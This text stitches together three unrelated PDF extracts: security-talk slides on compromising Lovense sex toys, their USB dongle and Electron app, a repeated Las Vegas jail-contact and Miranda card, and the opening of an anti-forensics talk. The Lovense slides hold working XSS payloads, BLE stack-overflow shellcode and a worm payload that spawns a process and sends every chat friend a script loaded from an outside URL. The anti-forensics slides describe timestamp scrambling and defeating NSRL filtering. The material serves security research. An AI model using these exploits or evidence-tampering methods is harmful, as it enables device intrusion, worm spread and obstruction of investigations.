• But on(“data”) and processData also call a(),
seemingly for logging
• How does it work?
• …by dumping the message as HTML into the DOM
• That’s, like, classic trivial XSS
Lovense Remote: incoming
message handling
t.on("data", function(n) {
e.dongleLiveTime = (new Date).getTime();
a(n.toString());
e.findDongle(n.toString(), t, i);
e.onData(n.toString());
});
...
processData: function(e) {
var t = null, i = this;
try {
t = JSON.parse(e)
} catch (e) {
return void a("data not json")
}
if (t) {
...
}
}
...
function a(e) {
if (!document.getElementById("dongleInfo")) {
var t = document.createElement("div");
t.id = "dongleInfo", t.style.display = "none", ...
document.getElementsByTagName("body")[0].appendChild(t);
}
var i = document.createElement("div");
i.innerHTML = e;
document.getElementById("dongleInfo").appendChild(i);
console.error(e);
}
• We can inject arbitrary HTML into the
electron app from the dongle
• We can only do it 32 characters at a time
• Is that enough to execute JavaScript?
• Yes
<img src=a onerror='alert(1)'>
Lovense Remote: incoming
message handling
Example 30 character payload:
Result when starting the app:
Doesn’t exist, will throw an error
• In practice, there’s a little more work to be
done to send a larger payload
• We can only execute 10 characters of JavaScript
at a time
• Because we’re relying on onerror, there’s no
strong guarantee of which order our payloads
will be executed in
• Solution: create an array, populate it
through explicit indices, then join it and
eval
• Use dummy payloads to serialize when
necessary
• I’m not a web developer, there’s probably a
better way to do this ☺
Lovense Remote: incoming
message handling
<img src=a onerror='z=[];’>
<img src=a onerror=''>
<img src=a onerror=‘’>
...
<img src=a onerror='z[0]="x=d"'>
<img src=a onerror='z[1]="ocu“’>
...
<img src=a onerror='z[30]="s:“’>
...
<img src=a onerror='z[61]=";“’>
<img src=a onerror='z.z=z.join’>
<img src=a onerror='z=z.z("")’>
<img src=a onerror='eval(z)'>
Initialize array
Serialization payload (send many)
Populate array
Shorten z.join so we can actually call it
Call z.join(“”)
eval the final, full payload!
BLE
Internet
USB
Lovense compromise map
The compromise now goes both ways: the
computer can compromise the dongle, and
the dongle can compromise the computer app
• The dongle basically just packages toy
messages and forwards them
• So yes, we could put HTML in there
• However, the dongle only receives 20
byte messages at a time…
• Is 20 characters enough to do XSS?
• No, it doesn’t look like it
• I tried with super short domains and using
<base>, but default scheme is file://, not
http://, so it’s still not enough
• There is a bug here: no null-terminator
check, so we could append uninitialized
data to our message
• But couldn’t find a way to control data
Compromising the app from the Hush
void ble_gattc_on_hvx(ble_evt_t *event, remote_toy_t *remote_toy)
{
char local_buf[20];
if ( remote_toy )
{
if ( ... )
{
uint16_t len = event->len;
zeroset(local_buf, 20);
if ( len >= 20 ) len = 20;
memcpy(local_buf, event->p_data, len);
sendHostMessage_(
"{\"type\":\"toy\",\"func\":\"toyData\",\"data\":{\"id\":"
"\"%02X%02X%02X%02X%02X%02X\",\"data\":\"%s\"}}\n",
remote_toy->mac[0], remote_toy->mac[1], remote_toy->mac[2],
remote_toy->mac[3], remote_toy->mac[4], remote_toy->mac[5],
local_buf);
}
}
}
• We can’t go straight from the toy to the app
• But maybe we can go toy -> dongle -> app
• We saw the dongle firmware doesn’t do much with
toy messages, just forwards them
• But there’s more code on the dongle than just Lovense’s
• The Application is what Lovense built
• The Bootloader is what handles DFU
• The SoftDevice is a driver for the chip’s hardware
• Closed source, built by Nordic Semiconductor
• For example, includes the implementation of the BLE stack
• So when the Application wants to send a BLE message to a toy,
it asks the SoftDevice to it (through SVC calls)
Compromising the dongle over BLE
Application
Flash Region
SoftDevice
Flash Region
0x00000000
0x0001B000
0x000218D8
Unused Flash
Region
0x0003C000
Bootloader
Flash Region
0x00040000
• Since we can debug the SoftDevice,
it’s easy to find where BLE messages
come from, especially with no ASLR
• setwp is your friend ☺
• After a bit of RE we can find packet
handlers for various protocols
• On the right: incoming packet handler
for the GATTC (General Attribute
Protocol Client) role, which is what the
dongle is
• Specifically, the handler for Read by
Type Response packets
Nordic SoftDevice BLE
vulnerabilities
void ble_gattc_packet_handler_(uint32_t input_len, uint8_t *input_buf,
uint8_t *gattc_event, int conn_handle, uint8_t* status)
{
...
switch(input_buf[0] & 0x3F)
{
...
case 0x09: // GATT Read By Type Response
if ( !(*status & 0x10) || input_len < 2 )
return NRF_ERROR_INVALID_PARAM;
num_attributes = 0;
attribute_data_length = input_buf[1];
input_buf_cursor = &input_buf[2];
input_remaining_len = input_len - 2;
while ( attribute_data_length <= input_remaining_len )
{
attribute_data->handle = *(u16*)input_buf_cursor;
attribute_data->value_ptr = &input_buf_cursor[2];
input_buf_cursor += attribute_data_length;
input_remaining_len -= attribute_data_length;
num_attributes++;
attribute_data++;
}
*status = 0;
break;
...
}
...
}
• GATT clients can send a “read by type”
request packet
• Contains a type and a range of handles to
read from
• Servers then respond with a “read by
type” response packet
• Returns data associated to handles
within that range that match that type
• The number of handle/data pairs is
determined by dividing remaining packet
length by the handle/data pair length
field
• That field is supposed to always be 0x7 or
0x15…
Offset(h) 00 01 02 03 04 05 06 07
00000000 09 06 0D 00 BE BA AD DE
00000008 0E 00 DE C0 AD 0B 0F 00
00000010 AD FD EE 0B
Ready by Type Response packets
Sample Packet:
09
06
0D 00
: packet type (read by type response)
: handle/data pair length
: handle
BE BA AD DE
: data
switch(input_buf[0] & 0x3F)
{
attributePair_s attribute_array[10];
...
case 0x09: // GATT Read By Type Response
if ( !(*status & 0x10) || input_len < 2 )
return NRF_ERROR_INVALID_PARAM;
num_attributes = 0;
attribute_data_length = input_buf[1];
attribute_data = attribute_array;
input_buf_cursor = &input_buf[2];
input_remaining_len = input_len - 2;
while ( attribute_data_length <= input_remaining_len )
{
attribute_data->handle = *(u16*)input_buf_cursor;
attribute_data->value_ptr = &input_buf_cursor[2];
input_buf_cursor += attribute_data_length;
input_remaining_len -= attribute_data_length;
num_attributes++;
attribute_data++;
}
*status = 0;
break;
...
}
Offset(h) 00 01 02 03 04 05 06 07
00000000 09 06 0D 00 BE BA AD DE
00000008 0E 00 DE C0 AD 0B 0F 00
00000010 AD FD EE 0B
Sample Packet:
attribute_array:
Offset(h) 00 01 02 03 04 05 06 07
00000000 0D 00 00 00 04 24 00 20
00000008 0E 00 00 00 0A 24 00 20
00000010 0F 00 00 00 10 24 00 20
00000018 00 00 00 00 00 00 00 00
00000020 00 00 00 00 00 00 00 00
00000028 00 00 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00
00000038 00 00 00 00 00 00 00 00
00000040 00 00 00 00 00 00 00 00
00000048 00 00 00 00 00 00 00 00
Read by type response handler
switch(input_buf[0] & 0x3F)
{
attributePair_s attribute_array[10];
...
case 0x09: // GATT Read By Type Response
if ( !(*status & 0x10) || input_len < 2 )
return NRF_ERROR_INVALID_PARAM;
num_attributes = 0;
attribute_data_length = input_buf[1];
attribute_data = attribute_array;
input_buf_cursor = &input_buf[2];
input_remaining_len = input_len - 2;
while ( attribute_data_length <= input_remaining_len )
{
attribute_data->handle = *(u16*)input_buf_cursor;
attribute_data->value_ptr = &input_buf_cursor[2];
input_buf_cursor += attribute_data_length;
input_remaining_len -= attribute_data_length;
num_attributes++;
attribute_data++;
}
*status = 0;
break;
...
}
Offset(h) 00 01 02 03 04 05 06 07
00000000 09 00 0D 00 BE BA AD DE
00000008 0E 00 DE C0 AD 0B 0F 00
00000010 AD FD EE 0B
Sample Packet:
attribute_array:
Offset(h) 00 01 02 03 04 05 06 07
00000000 0D 00 00 00 04 24 00 20
00000008 0D 00 00 00 04 24 00 20
00000010 0D 00 00 00 04 24 00 20
00000018 0D 00 00 00 04 24 00 20
00000020 0D 00 00 00 04 24 00 20
00000028 0D 00 00 00 04 24 00 20
00000030 0D 00 00 00 04 24 00 20
00000038 0D 00 00 00 04 24 00 20
00000040 0D 00 00 00 04 24 00 20
00000048 0D 00 00 00 04 24 00 20
00000050 0D 00 00 00 04 24 00 20
00000058 0D 00 00 00 04 24 00 20
00000060 0D 00 00 00 04 24 00 20
00000068 0D 00 00 00 04 24 00 20
value_ptr
Read by type response handler: malformed packet
Out of
bounds
switch(input_buf[0] & 0x3F)
{
attributePair_s attribute_array[10];
...
case 0x09: // GATT Read By Type Response
if ( !(*status & 0x10) || input_len < 2 )
return NRF_ERROR_INVALID_PARAM;
num_attributes = 0;
attribute_data_length = input_buf[1];
attribute_data = attribute_array;
input_buf_cursor = &input_buf[2];
input_remaining_len = input_len - 2;
while ( attribute_data_length <= input_remaining_len )
{
attribute_data->handle = *(u16*)input_buf_cursor;
attribute_data->value_ptr = &input_buf_cursor[2];
input_buf_cursor += attribute_data_length;
input_remaining_len -= attribute_data_length;
num_attributes++;
attribute_data++;
}
*status = 0;
break;
...
}
Offset(h) 00 01 02 03 04 05 06 07
00000000 09 01 0D 00 BE BA AD DE
00000008 0E 00 DE C0 AD 0B 0F 00
Sample Packet:
attribute_array:
Offset(h) 00 01 02 03 04 05 06 07
00000000 0D 00 00 00 04 24 00 20
00000008 00 BE 00 00 05 24 00 20
00000010 BE BA 00 00 06 24 00 20
00000018 BA AD 00 00 07 24 00 20
00000020 AD DE 00 00 08 24 00 20
00000028 DE 0E 00 00 09 24 00 20
00000030 0E 00 00 00 0A 24 00 20
00000038 00 DE 00 00 0B 24 00 20
00000040 DE C0 00 00 0C 24 00 20
00000048 C0 AD 00 00 0D 24 00 20
00000050 AD 0B 00 00 0E 24 00 20
00000058 0B 0F 00 00 0F 24 00 20
00000060 0F 00 00 00 10 24 00 20
value_ptr
Read by type response handler: malformed packet
Out of
bounds
• By setting attribute length to 0x01, we
can overflow many handle/data
pointer pairs
• Handles are 2 bytes, but dword aligned
• Upper 2 bytes of handle dwords aren’t
cleared
• The buffer we overflow is on the stack
• No stack cookies, no ASLR, no DEP
• => should be trivial
Nordic SoftDevice BLE vulnerabilities: exploitation
200046A0 = 20000008 00003D01 00000001 00000005
200046B0 = 00000005 00009045 200046F0 20000CE0
200046C0 = 00000000 00000000 0003EF14 00010633
200046D0 = 20004718 00002F4F 20004718 FFFFFFF1
200046E0 = 20004710 00000004 00000005 0000B985
200046F0 = 00000000 20001F00 00000016 200046A8
20004700 = 200024AA 00000016 20000850 00000017
20004710 = 200024A7 2000042C 00000000 20001EB2
20004720 = 2000042C 00000000 200024A7 0000569B
20004730 = 20001EB2 00000000 00000017 200024A7
20004740 = 2000042C 2000042C 00000004 00000000
Stack frame before overflow:
Return address
Saved registers
attributes_array
• Test: send packet full of 0xDA bytes
with attribute length 0x01
• => we overwrite the return address with a
pointer to our attribute data
• Since there’s no DEP, that means we can just
execute data within our packet!
• Restriction: we need our return address to
have its LSB set so that we execute in thumb
mode (Cortex M0 doesn’t support ARM mode)
• => we overwrite several local variables
• Need to see if we overwrite anything used on
the return path
Nordic SoftDevice BLE vulnerabilities: exploitation
Stack frame after overflow:
200046A0 = 20000008 00150001 2000DADA 20002476
200046B0 = 0001DADA 20002477 0000DADA 20002478
200046C0 = 2000DADA 20002479 0000DADA 2000247A
200046D0 = 2000DADA 2000247B 2000DADA 2000247C
200046E0 = 2000DADA 2000247D 0000DADA 2000247E
200046F0 = 0000DADA 2000247F 0000DADA 20002480
20004700 = 2000DADA 20002481 2000DADA 20002482
20004710 = 2000DADA 20002483 0000DADA 20002484
20004720 = 2000DADA 20002485 2000DADA 20002486
20004730 = 2000DADA 20002487 0000DADA 20002488
20004740 = 2000DADA 20002489 0000DADA 2000248A
Return address
Saved registers
attributes_array
Nordic SoftDevice BLE vulnerabilities: exploitation
Stack frame after overflow:
200046A0 = 20000008 00150001 2000DADA 20002476
200046B0 = 0001DADA 20002477 0000DADA 20002478
200046C0 = 2000DADA 20002479 0000DADA 2000247A
200046D0 = 2000DADA 2000247B 2000DADA 2000247C
200046E0 = 2000DADA 2000247D 0000DADA 2000247E
200046F0 = 0000DADA 2000247F 0000DADA 20002480
20004700 = 2000DADA 20002481 2000DADA 20002482
20004710 = 2000DADA 20002483 0000DADA 20002484
20004720 = 2000DADA 20002485 2000DADA 20002486
20004730 = 2000DADA 20002487 0000DADA 20002488
20004740 = 2000DADA 20002489 0000DADA 2000248A
Return address
Saved registers
attributes_array
...
switch(input_buf[0] & 0x3F)
{
case 0x09: // GATT Read By Type Response
...
*status = 0;
break;
}
sub_1185A(3, saved_arg_3);
...
int value = *(int*)saved_arg_4;
...
}
=> We need to make it such that saved_arg_3 is 0,
saved_arg_4 is dword-aligned and LR’s LSB is set
Nordic SoftDevice BLE vulnerabilities: exploitation
Incoming BLE packet ring buffer:
20002400 = 14 24 00 20 00 00 00 00 00 00 00 00 00 00 00 00
20002410 = 00 00 00 00 A8 00 48 02 8B 00 67 00 00 80 67 00
20002420 = 67 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00
20002430 = 00 00 00 00 1B 00 00 00 00 1A 1B 00 17 00 04 00
20002440 = 11 A4 0F CC 98 47 02 48 10 21 01 70 15 B0 F0 BD
20002450 = B2 1E 00 20 BE BE BE 1B 00 00 00 00 16 1B 00 17
20002460 = 00 04 00 BA BA BA BA BA BA BA BA BA BA BA BA BA
20002470 = BA BA BA BA BA BA BA BA BA BA 19 00 00 00 00 1A
20002480 = 19 00 15 00 04 00 B0 B0 00 00 00 00 00 00 00 00
20002490 = 00 00 00 00 07 3C 00 20 B0 B0 B0 1B 00 00 00 00
200024A0 = 06 1B 00 17 00 04 00 09 01 DA DA DA DA DA DA DA
200024B0 = DA DA DA DA DA DA DA 00 93 DA C1 E7 DA DA 04 49
Wireshark:
=> We can control packet alignment by changing
previous packets’ lengths
• Engineering hurdle: the Nordic SoftDevice
doesn’t provide an interface to send raw
BLE packets
• Option 1: implement our own BLE stack
• Option 2: hack some hooks into theirs
• I picked option 2 ☺
• Hooks are very simple but require some RE
• It’s on github in case anyone else wants to try
their hand at exploiting BLE stack bugs
• The interface is pretty dirty, no guarantees it’ll
work for you… but it did for me
Nordic SoftDevice BLE vulnerabilities: exploitation
void ble_outgoing_hook(uint8_t* buffer, uint8_t length);
int ble_incoming_hook(uint8_t* buffer, uint16_t length);
int send_packet(void* handle, void* buffer, uint16_t length);
Called by SoftDevice whenever a BLE packet is
sent so it can be modified beforehand.
Called by SoftDevice whenever a BLE packet is
received. Return value determines whether
normal SoftDevice processing should be skipped.
Function to send a raw packet on a given BLE
connection.
Nordic SoftDevice BLE vulnerabilities: exploitation
Incoming BLE packet ring buffer:
20002400 = 14 24 00 20 00 00 00 00 00 00 00 00 00 00 00 00
20002410 = 00 00 00 00 A8 00 48 02 8B 00 67 80 00 00 67 80
20002420 = 67 80 00 00 00 00 00 00 1B 00 00 00 01 00 00 00
20002430 = 00 00 00 00 1B 00 00 00 00 1A 1B 00 17 00 04 00
20002440 = 11 A4 0F CC 98 47 02 48 10 21 01 70 15 B0 F0 BD
20002450 = B2 1E 00 20 BE BE BE 1B 00 00 00 00 16 1B 00 17
20002460 = 00 04 00 BA 06 00 FC 01 16 02 00 B5 72 B6 00 F0
20002470 = 1C F8 8A 48 00 F0 F4 F8 88 48 19 00 00 00 00 1A
20002480 = 19 00 15 00 04 00 B0 B0 00 3C 00 20 64 24 00 20
20002490 = 16 00 00 00 CD B1 01 00 B0 B0 B0 1B 00 00 00 00
200024A0 = 16 1B 00 17 00 04 00 09 01 DA DA DA DA DA DA DA
200024B0 = DA DA DA DA DA DA DA 00 00 DA C1 E7 DA DA 04 49
• How do we execute more than 4
bytes of code at a time…?
• Send multiple packets!
1. Shellcode that performs a
function call with controlled
parameters, then returns cleanly.
2. A data buffer that can be used by
the function call
3. A buffer containing the function
call’s parameter values
4. The vuln-triggering packet
Nordic SoftDevice BLE vulnerabilities: exploitation
Incoming BLE packet ring buffer:
20002400 = 14 24 00 20 00 00 00 00 00 00 00 00 00 00 00 00
20002410 = 00 00 00 00 A8 00 48 02 8B 00 67 80 00 00 67 80
20002420 = 67 80 00 00 00 00 00 00 1B 00 00 00 01 00 00 00
20002430 = 00 00 00 00 1B 00 00 00 00 1A 1B 00 17 00 04 00
20002440 = 11 A4 0F CC 98 47 02 48 10 21 01 70 15 B0 F0 BD
20002450 = B2 1E 00 20 BE BE BE 1B 00 00 00 00 16 1B 00 17
20002460 = 00 04 00 BA 06 00 FC 01 16 02 00 B5 72 B6 00 F0
20002470 = 1C F8 8A 48 00 F0 F4 F8 88 48 19 00 00 00 00 1A
20002480 = 19 00 15 00 04 00 B0 B0 00 3C 00 20 64 24 00 20
20002490 = 16 00 00 00 CD B1 01 00 B0 B0 B0 1B 00 00 00 00
200024A0 = 16 1B 00 17 00 04 00 09 01 DA DA DA DA DA DA DA
200024B0 = DA DA DA DA DA DA DA 00 00 DA C1 E7 DA DA 04 49
; load our parameters from packet 3
add r4, pc, #0x44
ldmia r4!, {r0-r3}
blx r3
; the following is needed so that we
can send more vuln-triggering packets
ldr r0, =0x20001EB2
mov r1, #0x10
strb r1, [r0]
add sp, #0x54
pop {r4-r7,pc}
b 0x20002440
• Since we can repeatably call any given
function with controlled parameters and
data, we call memcpy to write larger
shellcode in RAM little by little
• Then we can call it, have it apply patches to
the dongle’s code in flash, and use that to
compromise the computer app
• Since the XSS payload is large, we generate it
in shellcode on the dongle rather than send it
over
Nordic SoftDevice BLE vulnerabilities: exploitation
cpsid i
; generate our html payload and put it in flash
bl generate_html_payload
; first erase unused page of flash (so we can copy stuff to it)
ldr r0, =SCRATCH_PAGE
bl nvmc_page_erase
; then copy our target page to last page of flash
ldr r0, =SCRATCH_PAGE
ldr r1, =MOD_PAGE
ldr r2, =0x400
bl nvmc_write
; now erase target page
ldr r0, =MOD_PAGE
bl nvmc_page_erase
...
cpsie i
; and we're done!
pop {pc}
BLE
Internet
USB
Lovense compromise map
The compromise now goes both ways: the
dongle can compromise the toy, and the toy can
compromise the dongle… and the computer
• We can XSS into an electron process
• It’s still just JavaScript, right?
• Wrong: electron lets you interact with files on
disk, spawn new processes etc
• In fact, this is how dongle DFU works
• But it’s chromium-based, so it’s sandboxed?
• Not in this case: lovense.exe run at Medium IL
• It’s not admin level privileges, but we can still
access and modify basically all of the user’s files,
access network etc
Lovense remote: what does XSS give us?
i.i(p.spawn)(this.exePath, ["dfu", "serial",
"--package=" + this.filename, "--port=" +
this.dongle.portInfo.comName, "--baudrate=" +
this.baudrate]);
Dongle DFU code (app.js):
lovense.exe in Process Explorer:
• The social feature has a lot of functionality
• Text chat, pictures, remote control, video chat…
• In theory, a lot of attack surface to explore
• In practice though…
• …the most basic XSS possible works: sending
HTML over as a text chat message
• Making this viral becomes trivial: just figure
out the right function to send messages from
JavaScript and spam your friends
Lovense remote: can we make this viral?
Lovense remote: final XSS payload
if(window.hacked != true)
{
window.hacked = true;
const { spawn } = require('child_process');
spawn('calc.exe', []);
var testo = window.webpackJsonp([], [], [7]);
var b = function(e, t, a) {
this.jid = e.split("/")[0],
this.fromJid = t.split("/")[0],
this.text = a, this.date = new Date
};
for(friend in testo.hy.contact.friendList)
{
testo.hy.message.sendMessage(new b(friend, testo.hy.chat.jid,
"<img src=a onerror=\"var x=document.createElement('script’);" +
"x.src='https://smealum.github.io/js/t.js’;" +
"document.head.appendChild(x);\">"));
}
}
1. Do whatever malicious
thing we feel like doing on
this victim machine
2. Grab the JavaScript object
that will let us access chat
3. Send an XSS payload that
will load this script to every
friend we have
1
2
3
BLE
Internet
USB
Lovense compromise map
We can now compromise any device from
any device – we’ve created a butt worm
Live demo
Conclusion | pdf |
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
Clark County Detention Center
330 S. Casino Center Blvd (702-671-3900)
Las Vegas City Jail
3200 Stewart Ave (702-229-6099)
Emergency Contact #: _____________
Bail Bond Contact #: ______________
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning.
MIRANDA WARNINGS
You have the right to remain silent.
Anything you say can and will be
used against you in a court of law.
You have the right to an attorney.
If you cannot afford an attorney,
one will be appointed to you.
If you are a juvenile, you have the
right to request your parents be
present for any questioning. | pdf |
Anti-Forensics
and Anti-Anti-Forensics
by Michael Perklin
(But not Anti-Anti-Anti-Forensics)
(...or Uncle-Forensics...)
Outline
Techniques that can complicate digital-forensic
examinations
Methodologies to mitigate these techniques
Other digital complications
This talk will deal with a variety of complications that can arise in a
digital investigation
Michael Perklin
Digital Forensic Examiner
Corporate Investigator
Computer Programmer
eDiscovery Consultant
Basically - A computer geek + legal support hybrid
Techniques in this talk...
Most of these techniques are NOT sophisticated
Each one can easily be defeated by an investigator
The goal of these techniques is to add man-hours/$$$
High costs increase chances of settlement
Wiping a hard drive, or using steganography will not be discussed
because they’ve been around for decades
Typical Methodologies:
Copy First, Ask Questions Later
Typically Law Enforcement
Assess relevance first, copy relevant
All types of investigators
Remote analysis of live system,
copy targeted evidence only.
Enterprise, Private if they have help
Methodology #1 is typically used by police
Methodology #2 is used by all types of digital investigators
Methodology #3 is typically used by Enterprise companies on their
employees
“Assess Relevance” method typically searches an HDD for one of a
few specific keywords. If found, the HDD is imaged for further analysis.
Typical Workflow
Process
Data For
Analysis
“Separate
Wheat from
Chaff”
Analyze
Data for
Relevance
Prepare
Report on
Findings
Archive Data
For Future
Create
Working
Copy
Create Working Copy
- Image the HDD
- Copy files remotely for analysis
Process Data
- Hash files
- Analyze Signatures
Separate Wheat
- De-NIST or De-NSRL
- Known File Filter (KFF)
- Keyword Searches
Analyze For Relevance
- Good hits or false positives?
- Look at photos, read documents, analyze spreadsheets
- Export files for native analysis
- Bookmark, Flag, or otherwise list useful things
Prepare Report
- Include thumbnails, snapshots, or snippets
- Write-up procedures (Copy/Paste from similar case to speed up workload)
- Attach appendices, lists, etc
Archive Data
- Store images on central NAS
- Shelve HDDs for future use
Classic Anti-Forensic
Techniques
HDD Scrubbing / File Wiping
Overwriting areas of disk over and over
Encryption
TrueCrypt, PGP, etc.
Physical Destruction
These 3 methods are fairly common amongst people like us
In reality, these are used rarely.
Each method implies guilt, and can be dealt with without tech.
Running Tallies on Slides
Tally of # Hours Wasted will be at bottom left
Tally of # Dollars Spent will be at bottom right
I will assume an average rate of $300/hr for the
digital investigator’s time
Red tallies indicate costs for current technique
Green tallies show total costs to-date
0 hours
$0
$300/hr rate is fairly average for junior-intermediate investigators
#1. Create a Working Copy
Confounding the first stage of the process
“Separate
Wheat from
Chaff”
Analyze Data
for Relevance
Prepare Report
on Findings
Archive Data
For Future
Create
Working Copy
Process Data
For Analysis
0 hours
$0
Copy each device for later analysis
...or copy the file from the remote live machine
AF Technique #1
Data Saturation
Let’s start simple:
Own a LOT of media
Stop throwing out devices
Use each device/container regularly if possible
Investigators will need to go through everything
8 hours
$2,400
Cell Phones
Laptops
Old HDDs
USB Keys
Burned CD/DVDs
Mitigating
Data Saturation
Parallelize the acquisition process
More drive duplicators = less total time
The limit is your budget.
Use their hardware against them:
Boot from a CD, plug in a USB HDD, mount’n’copy
The limit is the # of their machines
8 hours
$2,400
Incidentally, the # of their machines is typically equal to the number of
machines you need to copy!!
8 hours
$2,400
9 Machines imaging in parallel to an external USB drive.
Total time = time to image 1 drive.
AF Technique #2
Non-Standard RAID
Common RAIDs share stripe patterns, block sizes,
and other parameters
This hack is simple:
Use uncommon settings
Stripe size, stripe order, Endianness
Use uncommon hardware RAID controllers
(HP Smart Array P420)
Use firmware with poor Linux support.
Don’t flash that BIOS!
8 hours
$2,400
Non-standard RAID controllers sometimes allow you to choose arbitrary
blocksizes
and other parameters that would otherwise be taken care of automatically.
Less damaging for Public sector, can be very expensive for Private sector
Disk Order (0, 1, 2, 3? 3, 2, 1, 0?)
Left Synchronous? Right Synchronous?
Left Asynchronous? Right Asynchronous?
Big Endian? Little Endian?
Scott Moulton’s DEFCON17 talk about using porn to fix
RAID explains this problem well
16 hours
$4,800
There are so many parameters used by RAID controllers that it can be quite
time consuming to try all combinations in order to figure out the exact settings
used by the original device
Mitigating
Non-Standard RAIDs
De-RAID volumes on attacker’s own system
Use boot discs
Their hardware reassembles it for you
If RAID controller doesn’t support Linux, use Windows
Windows-Live CDs work well
Image the volume, not the HDDs
16 hours
$4,800
By recombining the RAID array on the attackerʼs system, their hardware does all the
heavy lifting for you.
All you need to worry about is copying the data to your drive.
#2. Process Data for Analysis
Confounding the processing stage
Process Data
For Analysis
“Separate
Wheat from
Chaff”
Analyze Data
for Relevance
Prepare Report
on Findings
Archive Data
For Future
Create
Working Copy
16 hours
$4,800
This stage involves:
Hashing
Full-Text Indexing
FileType identification
etc.
JPG File Internals
First 4 bytes: ÿØÿà
4 bytes in hex: FF D8 FF E0
ZIP Files: PK
EXE Files: MZ
PDF Files: PDF
AF Technique #3
File Signature Masking
File Signatures are identified by file headers/footers
“Hollow Out” a file and store your data inside
Encode data and paste in middle of a binary file
Transmogrify does this for you
0 hours
$0
File signatures are identified by the first few bytes
This makes it easy to fake a file match
File Signatures (cont.)
EXE files begin with
bytes MZ
It’s dead easy to make
files match their
extensions
16 hours
$4,800
This TXT file shows how easy it is to make a file match its extension
despite
having contents that are vastly different
Even though this txt file was created in notepad, it is recognized as a
‘Windows Executable’
because the first two characters are MZ.
Mitigating File Signature Masking
Use “Fuzzy Hashing” to identify potentially interesting
files
Fuzzy Hashing identifies similar but not identical files
Chances are, attacker chose a file from his own
system to copy/hollow out
“Why does this file have a 90% match with
notepad.exe?”
Analyze all “Recent” lists of common apps for curious
entries
“Why was rundll.dll recently opened in Wordpad?”
16 hours
$4,800
Fuzzy Hashing and Recent File analysis can mitigate false file signatures
fairly easily by asking simple questions
Confounding the sifting process
Process Data
For Analysis
#3. Separate Wheat from
Chaff
“Separate
Wheat from
Chaff”
Analyze Data
for Relevance
Prepare Report
on Findings
Archive Data
For Future
Create
Working Copy
16 hours
$4,800
Data Deduplication
Date Filtering
NSRL
Background: NSRL
National Software Reference Library (NSRL)
Published by National Institute of Standards and
Technology (NIST)
Huge databases of hash values
Every dll, exe, hlp, pdf, dat other file installed by every
commercial installer
Used by investigators to filter “typical” stuff
This process is sometimes called De-NISTing
16 hours
$4,800
De-NISTing a drive may bring 120GB of data down to about 700MB
Only user-created content will remain
Hundreds of gigabytes can be reduced to a few hundred megabytes
AF Technique #4
NSRL Scrubbing
Modify all of your system and program files
Modify a string or other part of the file
For EXEs and DLLs: recalculate and update the
embedded CRCs
Turn off Data Execution Prevention (DEP) so Windows
continues to run
NSRL will no longer match anything
12 hours
$3,600
Most files wonʼt need a lot of work: simply change a character and youʼre
good.
Executable files (DLLs, EXEs) have embedded Cyclical Redundancy Checks
(CRCs) that make sure they are still good
You will need to recalculate the CRCs for these files in order to change them
in a way that will keep them running
Data Execution
Prevention
Validates system files,
Stops unsafe code,
Protects integrity
boot.ini policy_level
/noexecute=AlwaysOff
28 hours
$8,400
DEP will stop Windows from running if it sees parts of Windows being
modified.
So turn it off! You can then run your modified version of Windows without
restriction.
Mitigating
NSRL Scrubbing
Search, don’t filter
Identify useful files rather than eliminating useless files
Use a Whitelist approach instead of a Blacklist
28 hours
$8,400
Whitelist approach looks for things that match
Blacklist approach suppresses things that donʼt
Use a whitelist approach
Background: Histograms
Investigators use histograms to identify which dates
have higher-than-average activity
e.g. VPN Logins, Firewall alerts, even FileCreated times
28 hours
$8,400
AF Technique #5
Scrambled MACE Times
All files store multiple timestamps
Modified - the last write
Accessed - the last read
Created - the file’s birthday
Entry - the last time the MFT entry was updated
Randomize timestamp of every file
(Timestomp does this)
Randomize BIOS time regularly via daemon/service
Disable LastAccess updates in registry
16 hours
